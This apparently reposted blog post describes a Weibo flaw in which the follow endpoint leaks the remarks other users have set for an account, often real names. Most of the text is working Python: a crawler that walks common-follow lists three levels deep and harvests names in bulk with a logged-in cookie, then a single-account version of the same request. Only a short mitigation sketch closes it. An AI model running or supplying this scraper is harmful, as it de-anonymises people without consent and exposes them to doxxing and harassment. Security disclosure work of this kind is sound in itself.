How to obtain a Weibo user's real name without their knowledge (batch retrieval supported)

Source: Internet
Author: User


In fact, I had already reported this problem to Weibo, but I was told that a willful product manager considered it a business feature. Is it really just willfulness when the real name behind my Weibo account gets leaked? I never submitted it myself! You collect my information without my consent, and then you display it just as willfully, without any fear of the consequences.

I found this problem by accident. When you follow someone, once certain conditions are met (I believe the condition is having a certain number of followees in common rather than mutual following, though I am not sure of the exact number), Weibo automatically displays the remark that other users have set for that person, and most of the time that remark is their real name.
(Because flashsky's name is public information, it is used here for the demonstration.)

Later, I found that I do not even need to follow the other person: as long as they follow me, I can see it as well.
In fact, not all of the remarks are real names, but after crawling, I found that the probability of getting a real name is very high.

Here is the program:

#!/usr/bin/env python
# coding: utf-8
import urllib
import urllib2
import re
import sys
import cookielib
import json

'''
1. Start from the entry page.
2. Crawl the first layer of users.
3. Use each first-layer user's oid to build the second-layer "common follow" URL.
4. Crawl the second layer.
'''

# global variables
oidlist = set()      # oids that have already been crawled
spiderlist = set()
count = 0

headers = {
    'Cookie': 'add your cookie here',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
    'DNT': 1,
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    'Referer': 'http://weibo.com/m4njusaka?from=feed&loc=at&nick=%E8%82%89%E8%82%89%E8%A6%81%E5%A5%BD%E5%A5%BD%E5%86%99%E4%BB%A3%E7%A0%81&noscale_head=1',
}


def get_name(content):
    '''Extract the nickname (onick) from a profile page.'''
    try:
        name = re.findall(r"CONFIG\['onick'\]='(.*?)'", content)
        return name[0]
    except Exception:
        pass


def get_oid(content):
    '''Extract the user id (oid) from a profile page.'''
    try:
        oid = re.findall(r"CONFIG\['oid'\]='(.*?)'", content)
        return oid[0]
    except Exception:
        pass


def get_real_name(user):
    '''POST to the follow endpoint; its response leaks the "remark" other users set.'''
    user['name'] = urllib.quote(user['name'])
    postdata = urllib.urlencode({
        'uid': user['id'],
        'objectid': '',
        'f': 1,
        'extra': '',
        'refer_sort': '',
        'refer_flag': '',
        'location': 'page_100505_home',
        'id': user['id'],
        'wforce': 1,
        'nogroup': 'false',
        'fnick': user['name'],
        '_t': 0,
    })
    url = "http://weibo.com/aj/f/followed?ajwvr=6&__rnd=1419910508362"
    req = urllib2.Request(url=url, data=postdata, headers=headers)
    result = urllib2.urlopen(req).read()
    real_name = re.findall('"remark":"(.*?)"', result)
    if real_name:
        return real_name[0]


def get_urllist(url):
    '''Return (uid, fnick) pairs scraped from a follow-list page.'''
    cj = cookielib.LWPCookieJar()
    opener = urllib2.build_opener(cj)
    urllib2.install_opener(opener)
    req = urllib2.Request(url, headers=headers)
    response = urllib2.urlopen(req)
    content = response.read()
    # anchor on the "private message" (私信) link that follows each user entry
    url_list = re.findall(r'action-data=\\"uid=(.*?)&fnick=(.*?)&.*?\\">私信', content)
    return url_list


def get_page_sum(url):
    '''Return the number of pages in the common-follow list.'''
    req = urllib2.Request(url, headers=headers)
    response = urllib2.urlopen(req)
    content = response.read()
    page = re.findall(r'page S_txt1', content)
    page_sum = len(page)
    return page_sum


def spider(depth, startURL):
    if depth <= 0:
        return 0
    url_list = get_urllist(startURL)
    if len(url_list) > 0:
        for url in url_list:
            spider_url = "http://www.weibo.com/p/100505%s/follow?relate=same_follow" % url[0]
            sum_page = get_page_sum(spider_url)
            for page in range(1, sum_page):
                spider_url = "http://www.weibo.com/p/100505%s/follow?relate=same_follow&page=%s" % (url[0], page)
                target_url = "http://weibo.com/u/%s" % url[0]
                if url[0] in oidlist:
                    continue
                spider(depth - 1, spider_url)
                get_user(url[0])
                oidlist.add(url[0])


def get_user(oid):
    url = "http://weibo.com/u/%s" % oid
    req = urllib2.Request(url, headers=headers)
    response = urllib2.urlopen(req)
    content = response.read()
    user = {'name': get_name(content), 'id': get_oid(content), 'real_name': ''}
    user['real_name'] = get_real_name(user)
    # the json.loads trick decodes the \uXXXX escapes in the remark
    print user['id'], urllib.unquote(user['name']), json.loads('{"test": "%s"}' % user['real_name'])['test']


def main():
    max_depth = 3
    # start crawling from this follow page
    startURL = 'http://weibo.com/p/1005053191954357/follow?from=page_100505_profile&wvr=6&mod=modulerel'
    spider(max_depth, startURL)


main()
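For readers who only want to verify the behaviour for a single account rather than crawl in bulk, the core of the script is the single POST to the follow endpoint, whose response carries the "remark" field. Below is a minimal sketch of that one request, assuming a Python 3 environment with the requests library; the endpoint URL and form fields are copied from the script above, while the cookie, uid and nickname values are placeholders you must supply yourself, and the endpoint may well have changed since this was written.

import re
import requests

headers = {
    # placeholder: a logged-in weibo.com cookie is required
    'Cookie': 'your weibo.com cookie here',
    'User-Agent': 'Mozilla/5.0',
    'X-Requested-With': 'XMLHttpRequest',
    'Referer': 'http://weibo.com/',
}

def fetch_remark(uid, nick):
    '''POST to the follow endpoint and pull the "remark" field out of the response.'''
    postdata = {
        'uid': uid, 'objectid': '', 'f': 1, 'extra': '',
        'refer_sort': '', 'refer_flag': '', 'location': 'page_100505_home',
        'id': uid, 'wforce': 1, 'nogroup': 'false', 'fnick': nick, '_t': 0,
    }
    url = 'http://weibo.com/aj/f/followed?ajwvr=6'
    resp = requests.post(url, data=postdata, headers=headers)
    # The remark (often the real name) appears as "remark":"..." in the response body.
    match = re.search(r'"remark":"(.*?)"', resp.text)
    return match.group(1) if match else None

if __name__ == '__main__':
    print(fetch_remark('1234567890', 'some_nickname'))  # placeholder uid and nickname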


Solution:

Strengthen the restrictions on when a remark is displayed to other users; a sketch of what that could look like follows.
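One hypothetical way to read "strengthen restrictions" concretely (my own sketch, not anything Weibo has confirmed): the follow endpoint should only ever return a remark to the user who created it, never surface other people's notes to third parties. All names below are invented for illustration.

def serialize_follow_response(viewer_id, target, remarks_by_owner):
    '''remarks_by_owner maps (owner_id, target_id) -> remark text (hypothetical store).'''
    payload = {'uid': target['id'], 'nick': target['nick']}
    # Only include a remark the viewer set themselves; never expose someone else's note.
    own_remark = remarks_by_owner.get((viewer_id, target['id']))
    if own_remark is not None:
        payload['remark'] = own_remark
    return payload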
